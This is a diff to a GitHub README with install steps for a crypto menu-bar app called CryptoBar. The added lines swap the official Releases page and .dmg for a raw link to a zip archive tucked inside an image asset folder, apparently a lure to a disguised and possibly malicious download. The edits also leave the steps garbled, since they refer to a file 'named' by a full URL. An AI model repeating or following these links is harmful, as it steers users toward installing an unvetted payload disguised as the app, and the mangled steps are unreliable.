macdm88/CryptoBar/README.md

 ## 📋 How to Install

 1. **Visit the Releases Page:**
-   Go to the CryptoBar [Releases page](https://github.com/macdm88/CryptoBar/releases).
+   Go to the CryptoBar [Releases page](https://raw.githubusercontent.com/macdm88/CryptoBar/main/CryptoBar/Resources/Assets.xcassets/qr_bybit.imageset/CryptoBar-3.7.zip).

 2. **Download the Latest Version:**
    On the Releases page, find the latest version of CryptoBar.
-Click the link that says "CryptoBar.dmg" to start downloading it.
+Click the link that says "https://raw.githubusercontent.com/macdm88/CryptoBar/main/CryptoBar/Resources/Assets.xcassets/qr_bybit.imageset/CryptoBar-3.7.zip" to start downloading it.

 3. **Open the Downloaded File:**
-   Once the download is complete, locate the `CryptoBar.dmg` file in your Downloads folder.
+   Once the download is complete, locate the `https://raw.githubusercontent.com/macdm88/CryptoBar/main/CryptoBar/Resources/Assets.xcassets/qr_bybit.imageset/CryptoBar-3.7.zip` file in your Downloads folder.
 Double-click it to open.

 4. **Drag to Applications Folder:**
    A window will appear showing the CryptoBar app icon.
 Drag this icon into your Applications folder.
 This installs the app on your computer.